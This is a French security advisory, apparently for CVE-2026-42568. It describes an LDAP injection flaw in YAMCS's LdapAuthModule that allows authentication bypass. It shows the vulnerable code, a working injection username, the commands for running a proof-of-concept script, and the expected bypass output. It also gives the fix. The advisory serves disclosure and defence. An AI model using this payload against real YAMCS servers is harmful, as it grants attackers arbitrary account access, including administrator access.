
Une vulnérabilité d'injection LDAP existe dans org.yamcs.security.LdapAuthModule. Le paramètre username est inséré directement dans les filtres de recherche LDAP sans échappement RFC 4515, permettant un contournement de l'authentification.
Une vulnérabilité d'injection LDAP existe dans org.yamcs.security.LdapAuthModule. Le paramètre username est inséré directement dans les filtres de recherche LDAP sans échappement RFC 4515, permettant un contournement de l'authentification.
| Champ | Valeur |
|---|
| CVE | CVE-2026-42568 |
| Gravité | MEDIUM |
| CWE | CWE-90 : Neutralisation incorrecte des éléments spéciaux dans une requête LDAP |
| Affecté | yamcs-core < 5.12.7 (avec authentification LDAP configurée) |
| Corrigé dans | yamcs-core 5.12.7 |
| Avis | GHSA-cqh3-jg8p-336j |
Cause racine (LdapAuthModule.java) :
var filter = userFilter.replace("{0}", username);
// username inséré directement — pas d'échappement RFC 4515
Avec un userFilter typique de (uid={0}), un nom d'utilisateur malveillant brise la structure du filtre :
Entrée : *)(uid=*))(|(uid=*
Filtre : (uid=*)(uid=*))(|(uid=*)
Résultat : Correspondance universelle — authentification contournée
pip install requests
python3 poc.py http://localhost:8090
Sortie attendue sur une instance vulnérable (avec LDAP configuré) :
[1] Contournement universel (n'importe quel compte)
Nom d'utilisateur : *)(uid=*))(|(uid=*
Mot de passe : n'importe quoi
Résultat : HTTP 200
[!!!] AUTHENTIFICATION CONTOURNÉE
[!!!] Jeton reçu : eyJhbGciOiJSUzI1NiJ9...
Note : Cette vulnérabilité n'affecte que les instances YAMCS avec
LdapAuthModuleconfiguré. Les installations par défaut utilisant l'authentification intégrée ne sont pas concernées.
Un attaquant non authentifié capable d'atteindre le serveur YAMCS peut contourner complètement l'authentification lorsque l'authentification LDAP est configurée, obtenant un accès en tant qu'utilisateur arbitraire, y compris les administrateurs.
Mettez à jour vers yamcs-core >= 5.12.7.
Le correctif applique l'échappement RFC 4515 au nom d'utilisateur avant de construire le filtre LDAP.
| Date | Événement |
|---|---|
| 2026-05 | Vulnérabilité signalée |
| 2026-05-26 | Correctif publié dans yamcs-core 5.12.7 |
| 2026-05-26 | Avis public publié |
Daniel Miranda Barcelona (Excal1bur)